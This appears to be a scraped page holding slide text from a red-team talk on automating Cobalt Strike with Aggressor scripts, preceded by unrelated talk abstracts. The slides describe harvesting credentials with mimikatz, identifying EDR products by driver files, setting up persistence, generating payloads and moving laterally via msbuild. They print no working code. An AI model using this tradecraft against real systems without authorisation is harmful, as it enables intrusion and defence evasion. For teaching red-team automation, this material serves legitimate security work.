This paper presents Reef, a system for generating publicly verifiable succinct non-interactive zero-knowledge proofs that a committed document matches or does not match a regular expression. We describe applications such as proving the strength of passwords, the provenance of email despite redactions, the validity of oblivious DNS queries, and the existence of mutations in DNA. Reef supports the Perl Compatible Regular Expression syntax, including wildcards, alternation, ranges, capture groups, Kleene star, negations, and lookarounds. Reef introduces a new type of automata, Skipping Alternating Finite Automata (SAFA), that skips irrelevant parts of a document when producing proofs without undermining soundness, and instantiates SAFA with a lookup argument. Our experimental evaluation confirms that Reef can generate proofs for documents with 32M characters; the proofs are small and cheap to verify (under a second).
Paper: https://eprint.iacr.org/2023/1886
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Climate Impact of Software Testing at Nordic Testing DaysKari Kakkonen
My slides at Nordic Testing Days 6.6.2024
Climate impact / sustainability of software testing discussed on the talk. ICT and testing must carry their part of global responsibility to help with the climat warming. We can minimize the carbon footprint but we can also have a carbon handprint, a positive impact on the climate. Quality characteristics can be added with sustainability, and then measured continuously. Test environments can be used less, and in smaller scale and on demand. Test techniques can be used in optimizing or minimizing number of tests. Test automation can be used to speed up testing.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
UiPath Test Automation using UiPath Test Suite series, part 6DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Albert Hoitingh
In this session I delve into the encryption technology used in Microsoft 365 and Microsoft Purview. Including the concepts of Customer Key and Double Key Encryption.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Full-RAG: A modern architecture for hyper-personalizationZilliz
Mike Del Balso, CEO & Co-Founder at Tecton, presents "Full RAG," a novel approach to AI recommendation systems, aiming to push beyond the limitations of traditional models through a deep integration of contextual insights and real-time data, leveraging the Retrieval-Augmented Generation architecture. This talk will outline Full RAG's potential to significantly enhance personalization, address engineering challenges such as data management and model training, and introduce data enrichment with reranking as a key solution. Attendees will gain crucial insights into the importance of hyperpersonalization in AI, the capabilities of Full RAG for advanced personalization, and strategies for managing complex data integrations for deploying cutting-edge AI solutions.
GridMate - End to end testing is a critical piece to ensure quality and avoid...ThomasParaiso2
End to end testing is a critical piece to ensure quality and avoid regressions. In this session, we share our journey building an E2E testing pipeline for GridMate components (LWC and Aura) using Cypress, JSForce, FakerJS…
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Alt. GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using ...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
2. #whoami
@ChrisTruncer
▸ Sys admin turned red teamer
▸ Florida State Seminole
▸ Co-Founder and Red Team Lead of
FortyNorth Security
▸ Open Source Developer
▹ Veil-Framework
▹ WMImplant
▹ EyeWitness
▹ ...and more
2
3. #whoami
@r3dQu1nn
▸ Sys/Net Admin turned Red Teamer/Pen Tester
▸ Previous:
▹ IT in the Navy for 9 years
▹ Navy Red Team Technical Lead
▸ Current:
▹ Red Team Security Consultant for Mandiant
▹ PowerShell Reverse Engineer
▸ Glorified Script Kiddie/Noobie
▹ https://github.com/harleyQu1nn/AggressorScripts
3
4. What’s This Talk About?
▸ Automation
▸ Aggressor
▹ Event driven language
▸ Events that we might care about
▸ Assessment/Attack lifecycle
▸ Where can automation help?
▸ Demos
▸ Links
4
5. This is NOT About…
▸ Automating Red Teams
▸ Automating Pen Testing
▸ There’s something to be said about the
human mind analyzing the problem
▹ What if an exploit fails once, but runs
the second time?
▹ How does automation account for this?
▹ Can it always identify the root cause?
▸ This isn’t SKYNET for offensive work
5
https://ih1.redbubble.net/image.412212290.3664/flat,800x800,075,f.jpg
7. Automation
▸ Automation is useful for tasks
▹ Tasks that don’t require interaction
▹ Doesn’t need human processing
▸ At some level, we’re lazy
▹ Why manually do something if we can automate it?
▸ Trivial tasks are prime candidates
▹ Don’t require intensive analysis, if any
▸ How long will you have that initial access?
▹ Do you have the right permissions to install
persistence?
▹ Can you install persistence fast enough before the
victim user logs off?
▹ Automation can help us accomplish these much faster
7
8. Automation
▸ There are additional benefits beyond letting
us sit and watch something do our job J
▸ Ensure a uniform process is always
followed
▹ You can build out protection
mechanisms that keep you from doing
something
▸ Prevent user error
▹ Rather than fat fingering a
parameter/command, automation can
ensure you always run it correctly
8
9. Automation
▸ How can red teams/or pen testers use
automation on their tests
▹ Talk is cheap – what’s an easy way to
implement?
▸ Open Source
▹ Metasploit resource scripts are a good
option
▸ How do we do it?
▹ We’re a Cobalt Strike shop
▹ Scripts and code we reference/release
will use Aggressor
9
https://www.cobaltstrike.com/images/art/hacker_small.png
11. Aggressor – What is it?
▸ Aggressor is a scripting language built into
Cobalt Strike
▹ Since version 3.0
▸ It is based on the language Sleep
▸ Aggressor lets you automate operator
actions, manipulate data, generate reports,
etc.
▸ Aggressor isn’t a standard programming
language
▹ It’s an event driven language
11
https://memegenerator.net/instance/52901150/buzz-lightyear-meme-fixd-scripts-scripts-everywhere
12. Event Driven Language
▸ This doesn’t generate a compiled binary which
you run on a computer
▸ Rather than “starting” a program, your code is
triggered when a specific event is encountered
▹ Think similar to WMI events that occur after
X happens
▹ Remember IRC Bots?
▸ Aggressor is driven by events that happen while
it is running
▹ These are clearly related to actions that
occurs while compromising a system
12
13. Aggressor – The Core
▸ Aggressor is based on the language Sleep
▹ http://sleep.dashnine.org/manual/index.html
▸ Sleep is a “java-based scripting language heavily
inspired by Perl”
▸ Aggressor is an additional set of exposed
functions for extending Cobalt Strike and its
associated functionality
▹ Extending can also mean creating
automation for your requirements
13
https://www.amazon.com/gp/product/143822723X?ie=UTF8&tag=slejavscrlan-
20&linkCode=as2&camp=1789&creative=9325&creativeASIN=143822723X
14. Aggressor – The Core
▸ Aggressor has the ability to interact with Cobalt
Strike, Beacons, and data such as:
▹ Running commands within a Beacon,
interpreting results, and making a decision
▹ Interacting with downloaded screenshots or
keylogged data
▹ Modify sites hosted by Cobalt Strike
▹ Interact with credentials stored on your team
server
▹ Develop custom reports for your customers,
and more…
14
16. Aggressor Scripting
▸ Aggressor scripting utilizes different functionality
to enable its developers
▸ Events – Aggressor Events initiates and runs your
code when a specific condition occurs
▸ Functions – Allow you to run “checks”, perform an
action locally, or run a command within Beacon -
this is the mechanism for performing an action
▸ Hooks – Can allow you to generate pop-up menus
▸ The Data Model – These are different data
repositories that you can manipulate
16
17. Aggressor Events
▸ There are triggerable events for almost everything
you could wish with Aggressor
▸ beacon_initial – This monitors for new beacons
checking in to your team server
▸ event_join – This event occurs when a new user
connects to your team server
▸ heartbeat_* - This event occurs every X seconds
or minutes
▸ ssh_initial – As new ssh connections check in,
this event will fire
17
18. Aggressor Events
▸ Remember how your DNS beacons first check in,
but with no data?
▸ beacon_initial_empty – This event triggers
when the team server receives an empty beacon
▸ One of the first things people may do is type
“checkin” and/or set the “mode”
▹ Save yourself the step!
18
https://lh4.googleusercontent.com/TJdG-5-
4YzBK9MuoaiNqO5k1gaCRtBZ181KXNb1pvLZbWTj6N1Hi-T9GcHWuwOIQNpvekw0swJ0D-
mTouZMb4h0mYyNe0GRFqRuF-SwfM42u7n5TPLi0cuwsENqPB4zVSa0ioprJ
19. Aggressor Events
▸ Events expose access to different objects
depending on the event
▹ beacon_initial – This will provide a
handle into the individual beacon
checking in
▹ This is how you can have an
individual beacon perform an
action
▹ Heartbeat_* - exposes nothing, but you
can use a function to iterate over all
beacons
▹ This provides you access to them
19
20. Aggressor Events
▸ There are a large number of events that you
can use to trigger your code
▸ Events are available here -
https://www.cobaltstrike.com/aggressor-
script/events.html
▸ You can’t create your own custom events
▹ This part isn’t user-expandable
▸ However, you can always ask if you can
think of a useful trigger
20
21. Aggressor Functions
▸ Functions are the “code” associated with
your Aggressor Script
▸ Functions dictate the actions that you will
perform once your trigger is activated
▸ Your code isn’t limited to what you see
listed on the Aggressor function page
▸ Aggressor is based on Sleep, right?
▸ Your code will likely be a combination of
Aggressor and Sleep
21
22. Aggressor Functions
▸ Functions include essentially every action
that you can conduct within Beacon
▹ bpowershell_import – Imports a
PowerShell script within a beacon
▹ bps – Performs a process listing on the
targeted beacon
▹ blogonpasswords – Runs the mimikatz
logonpasswords command
▹ bls – Lists all files in a specific
directory
▹ bsetenv – Sets an environmental
variable on the current beacon
22
23. Aggressor Functions
▸ It also includes “metafunctions” with
interact and provide results based on
Beacon metadata
▹ -is64 – This function will return true if
the Beacon is running in a x64 process
▹ -isadmin – This returns true if the
Beacon is running with admin rights
▹ -isssh – This returns true if the active
session is a SSH session
23
24. Aggressor Functions
▸ You also have the ability to interact with
Cobalt Strike (rather than Beacon) and
manipulate data through Aggressor
▹ gzip – Gzip a string
▹ Base64_decode – Base64 decode a
string
▹ openfilebrowser – Opens the file
browser interface for a beacon
▹ openScreenshotBrowser – Opens the
screenshot tab
▹ str_encode – Encodes a string in the
specified encoding format
24
25. Aggressor Sample
▸ Let’s piece some of this together in a
sample scenario
▸ You’ve compromised a Windows jump-box
used by admins/users
▸ You were able to escalate privileges
▸ You’re interested in capturing passwords
from users regularly logging in to the
system
▸ How can Aggressor help?
25
35. A Phishing Tale
▸ What’s likely the most prevalent method of
gaining access into an environment?
▸ Phishing!
▸ This is a time intensive process
▹ Generally requires developing a
scenario for your customer
▹ Writing custom malware for your
customer and scenario
▹ Developing domain reputation
▹ Etc.
35
http://2.bp.blogspot.com/_3zyldbmlRcQ/SFHr8lUkWpI/AAAAAAAAACg/KOLMVHuSY-
g/s320/_40998639_net_phishingcartoon203.gif
36. A Phishing Tale
▸ Eventually, you’ve fired your first salvo and
have started phishing
▸ If you’re lucky, your first target opens your
e-mail and runs your malware
▸ However, this isn’t always the case
▹ It might take a few people
▹ If you’re sending every 15-30 minutes,
time adds up
▸ What if you go grab a drink, are watching a
different screen, etc.
▹ Do you see your incoming Beacon?
36https://i.pinimg.com/736x/7a/23/fb/7a23fb0506b89f26b01734d6f2ca499d--cartoons.jpg
37. A Phishing Tale
▸ One of the worst feelings can be coming
back to your system and seeing you missed
a callback
▸ It’s also great to know right when your
Beacon arrives
▸ Aggressor can help
▹ Let’s look into the correct trigger
▹ There’s publicly available code that
sends text messages via e-mail
▹ Sleep can let us run an existing script
37https://i.pinimg.com/736x/82/dc/f8/82dcf869638e2e912822cb51aafdc3bb--stupid-stuff-nerd-stuff.jpg
49. Identifying EDR
▸ Now that we’ve been alerted to our beacon,
we might want to recon it
▸ What sort of data are we interested in?
▹ Sky’s the limit
▹ Network Connections/Interfaces
▹ Mapped Drives
▹ Local Admin Rights
▹ Etc.
▸ What about end point protection
software/defenses and its settings?
49
50. Identifying EDR
▸ Most EDR products install minifilter drivers/.sys files
▸ Installed to %SystemRoot%System32drivers or
%SystemRoot%System32DriverStoreFileRepository
▹ Minifilter altitudes are allocated by
Microsoft and are publicly listed
▹ https://docs.microsoft.com/en-us/windows-
hardware/drivers/ifs/allocated-altitudes
▹ This document associates minifilter drivers with
vendor names
50
51. Identifying EDR
▸ Why is this important and how can we use this?
▹ If the EDR product is not using the cloud based option
we can identify the minifilter driver and match it to
the company name
▹ This process can be automated using Aggressor
▹ Gives Red Teamers awareness of what they are up
against before executing commands
▸ How can this be automated?
▹ Cobalt Strike's Beacon has a built-in 'ls' command we
can use
▹ This built-in 'ls' command uses Win32 API's to list a
directory (more stealthy than using dir or powershell)
51
52. Identifying EDR
▸ Does the built-in 'ls' command have documentation??
▹ https://www.cobaltstrike.com/aggressor-
script/functions.html#bls
52
53. Identifying EDR
▸ List out the driver directories and parse the results
with conditional statements to determine what EDR is
present
▹ Define a static array of .sys files
▹ Store the 'ls' command results in an array
▹ Parse the results array and do exact matching
to determine the proper vendor information
▹ Profit
▸ We can also identify other AV products and Admin
Tools present using the 'ps' built-in beacon command
and matching on the process name
53
61. Persisting
▸ We’ve found minimal EDR software, or
exclusions which we can exploit to
maintain access
▸ Persistence might be the next step we want
to take (depending on previous results)
▸ Automating persistence is something we
hesitate on doing
▸ Let’s have this be a combination of manual
analysis and Aggressor
61
62. Persisting
▸ There’s a couple different ways to persist
depending on the level of access
▹ Registry Key
▹ Scheduled Task
▹ WMI Persistence
▸ Rather than doing this all from the
command line, let’s generate a pop-up for
ease of use!
62
79. Generating Payloads
▸ Payload generation is another crucial step in Red
Team engagements and are used for many different
reasons
▹ Initial Access
▹ Lateral Movement
▹ Persistence
▹ Obfuscation/Encoding/AWL Bypass
▸ Beneficial for Blue Team as well!
▹ Signature based identifiers/IOCs
▹ Test detection capabilities
▹ Payload sizes/types
79
80. Generating Payloads
▸ What types of payloads can we generate?
▹ HTTP
▹ HTTPS
▹ SMB
▹ DNS
▸ How do they work and how are they generated?
▹ Staged vs Stageless (S)
▹ Based off listener information, malleable
profile, architecture selection (x64/x86)
▹ Attacks -> Packages menu options
80
81. Generating Payloads
▸ How can we automate payload generation using
Aggressor?
▹ Utilize dialog API with drow_listener
▹ artifact/artifact_stageless functions
81
https://www.cobaltstrike.com/aggressor-script/functions.html#dialog
88. Lateral Movement
▸ Lateral movement is a vital part of every
engagement and can be approached in
different ways
▹ What value can we add if we
show successful pivoting inside a
network?
▹ 9 times out of 10 we need to
move laterally to accomplish our
objectives
▸ Can we automate this methodology?
▹ How can we use Aggressor Scripts to
enhance lateral movement?
88
89. Lateral Movement
▸ Built-in methods of lateral movement
inside of beacon
▹ wmi
▹ psexec/psexec_psh
▹ winrm
▸ All of these methods invoke a
PowerShell one-liner based on the listener
selection
▹ Good for quick and easy lateral
movement
▹ Bad for staying stealthy and avoiding
the use of PowerShell/PsExec
89
90. Lateral Movement
▸ Let's use Aggressor to build out a newer
technique of Lateral Movement
▸ Focus on using unmanaged powershell
with msbuild
▸ Set global variables to help generate the
xml file
▸ Functions that we need to utilize:
▹ alias
▹ beacon_command_register
▹ bupload_raw
▹ bpowerpick
▹ exec 90
104. Reporting
▸ Reporting is part of every assessment and
it should be done right
▹ What value are we if we can hack our
customers but can’t convey what we
did, risk remediations, etc?
▸ There are steps you can take to make
reporting more efficient
▹ Develop approved finding language
▹ Develop reporting templates
▹ Automate generating commonly
requested information
104
105. Reporting
▸ Let’s tackle that last bullet point
▹ Automate generating commonly
requested information
▸ What’s something that our customers
ALWAYS ask?
▹ What computers were compromised?
▹ What accounts were compromised?
▸ Let’s create a report generating function
which captures this information!
105
https://vignette.wikia.nocookie.net/cryptidz/images/c/c6/Why_Not_Zoidberg.jpg/revision/latest?cb
=20160219063637
109. Where to get this?
▸ We just covered a lot of different code
▸ Aggregate everything within a central repo
▹ This is not all our code
▹ It’s some of the scripts we use the most in
one area
▸ https://github.com/FortyNorthSecurity/Aggressor
Assessor
▹ Get all of the code here!
109
110. ▸ Aggregate everything within a central repo
▹ This is not all our code
▹ It’s some of the scripts we use the most in one area
▸ https://github.com/FortyNorthSecurity/AggressorAsses
sor
▹ Get all of the code here!
@ChrisTruncer
▹ https://www.fortynorthsecurity.com
@ r3dQu1nn
▹ https://github.com/harleyQu1nn/AggressorScripts
110
Thanks!